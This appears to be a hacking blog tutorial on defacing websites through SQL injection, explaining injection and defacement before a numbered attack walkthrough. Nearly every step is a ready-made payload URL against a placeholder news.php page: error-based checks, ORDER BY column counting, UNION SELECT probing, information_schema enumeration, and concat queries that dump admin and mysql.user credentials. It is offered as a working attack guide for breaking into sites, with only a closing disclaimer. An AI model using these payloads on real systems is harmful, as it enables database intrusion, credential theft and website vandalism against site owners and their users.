is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. So, Let’s Learn How To Deface Websites Using SQL Injection With .
attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
What Is Website Defacement ??
is an attack on a website that changes the visual appearance of the site or a web page. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own. Defacement is generally meant as a kind of electronic graffiti and, as other forms of vandalism, is also used to spread messages by politically motivated “Cyber Protesters” or “Hacktivists”.
Defacing a website simply means replacing the index.html file of a site by attacker’s own file. Now all the users who’ll open the website will see the page uploaded by the attacker.
Steps To Deface Websites Using SQL Injection:
1) Vulnerability Check:
To check a vulnerable website for SQL Injection, you need to find a page that looks like this –
Now to test if it’s vulnerable, we add a ‘ (quote) to the end of URL and that would look like –
If the database is vulnerable, the page will spit out a MySQL error something similar to –
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
And that means the Site is vulnerable to SQL injection but if the page loads as normal then the website is not vulnerable to SQL Injection.
2) Finding the number of columns:
To find the number of columns in the database, we’ll use the statement ORDER BY which tells the database how to order the result. Well just incrementing the number until we get an error.
http://www.website.com/news.php?id=1 order by 1/* <– No Error
http://www.website.com/news.php?id=1 order by 2/* <– No Error
http://www.website.com/news.php?id=1 order by 3/* <– No Error
http://www.website.com/news.php?id=1 order by 4/* <– Error
We’ll get message like this: Unknown column ‘4’ in ‘order clause’ or something like that which means the database has 3 columns, as we got an error on 4.
3) Check for UNION function:
We now are going to use the “UNION” command to find the vulnerable columns because with the union command we can select more data in one SQL statement. So we have –
http://www.website.com/news.php?id=1 union all select 1,2,3/* (As we’ve already found that the number of columns is 3 in the second step.)
If we see some numbers on the screen, i.e 1 or 2 or 3 then the UNION works.
4) Check for DataBase Version:
We now need to find the database version, name, and user. We do this by replacing the vulnerable column numbers with the following commands:
Or if these don’t work then try:
The URL would look like:
http://www.website.com/news.php?id=1 union all select 1,user(),version(),3/*
If you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …” Then what we need is convert() function (I didn’t see any website article covering this problem, So I must cover it.)
i.e. http://www.website.com/news.php?id=1 union all select 1,convert(@@version using latin1),3/*
Or with hex() and unhex()
i.e. http://www.website.com/news.php?id=1 union all select 1,unhex(hex(@@version)),3/*
The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.
5) Obtaining Table And Column Name:
In this step, We aim to list all the table names in the database. The “table_name” goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. But in most of the cases, we must guess table and column name.
common table names are: user/s, admin/s, member/s, etc.
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc.
URL would be http://www.website.com/news.php?id=1 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good)
We know that table admin exists. . .Now to check column names –
http://www.website.com/news.php?id=1 union all select 1, username, 3 from admin/* (if you get an error, then try the other column name)
We get username displayed on the screen, the example would be the admin, or superadmin etc. . .Now to check if column password exists –
http://www.website.com/news.php?id=1 union all select 1, password, 3 from admin/* (if you get an error, then try the other column name)
We’ll see the password on the screen in Hash or Plain-Text format, it depends on how the database is set up i.e md5 hash, mysql hash, sha1, etc.
Now we must complete query as of our need. And for that, we can use concat() function (it joins the strings).
i.e. http://www.website.com/news.php?id=1 union all select 1, concat(username,0x3a,password),3 from admin/*
Note: Here, I used 0x3a, its hex value for colon)
(The another way is to use ASCII Value for that. Example: char(58))
http://www.website.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*
Now we get displayed username: password on screen, i.e admin: admin or admin: HACKAGON
When you have this, you can login like admin or some superuser. If can’t then guess the right table name, you can always try mysql.user (Default). It has user password columns, So the URL would be
http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
6) Incase of MySQL 5:
Uptil step 5 is for MySQL version < 5 (i.e 4.1.33, 4.1.12, etc.) But for MySQL 5 we need information_schema. It holds all tables and columns in the database. To get tables, we use table_name and information_schema.tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*
Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note: Here, I put 0,1 (Get 1’s result starting from the 0th)
Now to view the second table, we’ll change limit 0,1 to limit 1,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
The second table is displayed. Now for the third table, we put limit 2,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
Keep incrementing the limit until you get some useful table like db_admin, poll_user, auth, auth_user, etc.
To get the column names, the method will be the same. Where we use column_name and information_schema.columns.
The method will be as same as above. So the example would be –
http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column is diplayed. The second one (we change limit 0,1 to limit 1,1)
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
The second column is displayed, so keep incrementing the limit until you get something like username, user, login, password, pass, passwd, etc.
If you wanna display column names for specific table use this query (where clause). Let’s say that we found table users.
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*
Now we’ll get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note: This wouldn’t work if the magic quotes are ON.
Let’s say that we found columns user, pass, and email. Now complete the query to put them all together. For that we use concat(), As I used it earlier.
i.e. http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/
We’ll get here user:pass:email from table users. Example: admin:hash:email@example.com
Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.
Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.